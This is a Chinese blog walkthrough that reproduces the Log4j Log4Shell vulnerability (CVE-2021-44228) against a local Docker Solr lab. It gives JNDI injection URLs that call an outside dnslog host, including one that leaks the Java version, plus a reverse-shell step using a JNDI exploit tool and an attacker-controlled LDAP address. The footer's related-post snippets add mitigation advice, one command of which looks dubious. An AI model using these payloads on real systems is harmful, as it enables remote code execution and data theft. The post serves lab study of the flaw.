Log4j-CVE-2021-44228漏洞复现

已于 2022-04-01 00:17:23 修改
阅读量3.1k 收藏 4
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2022-03-31 18:42:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrHatSec/article/details/123880103
版权

Log4j-CVE-2021-44228漏洞复现

一、漏洞描述

Log4j2作为一个开源的Java日志记录插件,被众多项目引用,因此,当其漏洞出现时,影响的范围也极大,可以算是继Python的request库之后的又一重大供应链攻击了。

二、环境搭建

使用docker来搭建漏洞利用环境

sudo docker-compose up -d

在这里插入图片描述
查看一下映射的端口

sudo docker ps

在这里插入图片描述
访问本地端口 8983
在这里插入图片描述
访问到这个页面,说明环境已经搭建完毕

三、漏洞利用

Dnslog 平台获取一个 dns 域名

在这里插入图片描述
构造Payload为:

http://127.0.0.1/solr/admin/cores?_=1648718155484&indexInfo=false&wt=${jndi:ldap://test.zetcrf.dnslog.cn/}

直接访问
在这里插入图片描述
查看 Dnslog平台是否接受到数据
在这里插入图片描述
也可以外带出 Java 的版本信息,构造 Payload

http://127.0.0.1/solr/admin/cores?_=1648718155484&indexInfo=false&wt=${jndi:ldap://${sys:java.version}.zetcrf.dnslog.cn/}

在这里插入图片描述
可以看到外带出的 Java版本为 1.8

四、反弹shell

反弹shell需要用到的工具 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

需要的小伙伴自行搜索下载

启动 JNDI 服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "cmd" -A "ip"

在这里插入图片描述
启动成功之后,我们按照目标网站的 jdk 版本来选择 构造 payload

http://127.0.0.1/solr/admin/cores?_=1648718155484&indexInfo=false&wt=${jndi:ldap://xxxx:1389/oe7hxd}

然后监听端口
在这里插入图片描述
访问刚刚构造好的 Payload
在这里插入图片描述
成功获取到 shell
在这里插入图片描述

MrHatSec
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j漏洞(CVE-2021-44228)
qq_32445755的博客
01-13 505
Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。
apache-log4j-2.17.0 核心jar包
03-31
Log4j 是一个日志记录框架,Log4j 2 是对 Log4j 的升级,提供了重大改进,超越其前身 Log4j 1.x,并提供...Log4j 团队已获悉一个安全漏洞 CVE-2021-45105,该漏洞已在 Java 8 及更高版本的 Log4j 2.17.0 中得到解决。
apache log4j 2(CVE-2021-44228)漏洞
net的博客
04-04 841
这个漏洞的根本原因在于log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。然而,我们没有对用户输入进行任何过滤或验证,这意味着如果用户输入包含恶意代码,它将会被记录到日志文件中。JNDI 的一种实,允许按照具体的名称逻辑查找对象的位置,并输出对象的内容,此对象可以通过Java。协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了Log4j。
一次Log4j2漏洞过程
最新发布
weixin_60830484的博客
04-17 350
本次将著名的Log4j2远程代码执行漏洞(CVE-2021-44228)
Log4j2—CVE-2021-44228漏洞
oiadkt的博客
04-10 470
Log4j2—CVE-2021-44228漏洞
log4j2-rce-cve-2021-44228 漏洞
weicanh的博客
04-29 228
log4j 2.15.0 开始,默认情况下已禁用此行为。从版本 2.16.0(以及 2.12.2、2.12.3 和 2.3.1)开始,此功能已被完全删除。
【vulhub】Log4j2:CVE-2021-44228漏洞
weixin_49422491的博客
09-13 2610
【vulhub】Log4j2:CVE-2021-44228漏洞
Log4j 2 (CVE-2021-44228)漏洞
Pluto.的博客
11-21 515
Log4j 2 (CVE-2021-44228)漏洞
Apache Log4j2远程代码执行漏洞(CVE-2021-44228)
qq_40640917的博客
01-10 2426
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。攻击机参数:Kali(或安装有msfconsole的任意Linux/Windows操作系统)靶机容器:vulfocus/log4j2-rce-2021-12-09。靶机参数:Centos8.1。
Log4j-2.15.0-rc2.zip
12-10
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228) 包含log4j-slf4j-impl-2.15.0.jar、log4j-1.2-api-2.15.0.jar、log4j-core-2.15.0.jar、log4j-web-2.15.0.jar、log4j-api-2.15.0.jar
log4j-api-2.15.0-rc2.jar
12-10
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)2.15.0-rc2版本(jar包名称仍为2.15.0,源码编译出来的)
CVE-2021-44228——Log4j2-RCE漏洞
Li-D的博客
06-10 1753
Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞
Log4j2漏洞(CVE-2021-44228)
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
log4j2漏洞(CVE-2021-44228)
qq_58000413的博客
09-13 901
接着我们再构造payload action=${jndi:ldap://${sys:java.version}.0tortx.dnslog.cn}cd vulhub/log4j/CVE-2021-44228 进入目录里。docker-compoes up -d 开启环境。docker-compoes ps 查看对应的端口。可以看到端口在8983上,我们到服务器防火墙打开8983。出java版本,则存在命令执行漏洞
漏洞log4j2 CVE-2021-44228
zg_111的博客
03-20 2480
漏洞log4j2 CVE-2021-44228漏洞
CVE-2021-44228:log4j2漏洞
fainpo的博客
05-07 271
漏洞适用版本:2.0 <= Apache log4j2 <= 2.14.1。
Apache Log4j2代码执行漏洞(cve-2021-44228)
Bird&Bird
12-14 9326
目录一、漏洞描述二、影响范围三、漏洞1、创建一个maven项目,并导入log4j的依赖包2、编写POC3、编写恶意类4、起http服务5、编译并开启LDAP服务6、运行POC四、反弹shell1、靶场搭建2、访问漏洞环境,环境部署成功3、起RMI和Ldap服务4、开启nc监听5、火狐浏览器进行验证6、反弹shell成功 一、漏洞描述 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详
apache log4j CVE-2021-44228漏洞怎么解决
06-03
漏洞描述: Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修漏洞的版本2.17.0,建议用户尽快升级到该版本。 2.使用安全策略文件 在升级之前,可以通过使用安全策略文件来限制日志信息中使用的类和方法,以减少攻击面。可以使用以下命令生成策略文件: ``` java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将策略文件放置在类路径下,例如在Tomcat中,可以将其放置在`$CATALINA_BASE/conf`目录下。 3.禁用Log4j JNDI Lookup功能 如果无法立即升级,可以通过在JVM参数中添加以下选项来禁用Log4j JNDI Lookup功能: ``` -Dlog4j2.formatMsgNoLookups=true ``` 或者在log4j2.xml配置文件中添加以下选项: ``` <Configuration> <properties> <property name="log4j2.formatMsgNoLookups">true</property> </properties> ... </Configuration> ``` 以上是针对Apache Log4j 2.x的解决办法,如果您使用的是其他版本的Log4j,请查看厂商的官方文档或者联系技术支持获取解决办法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值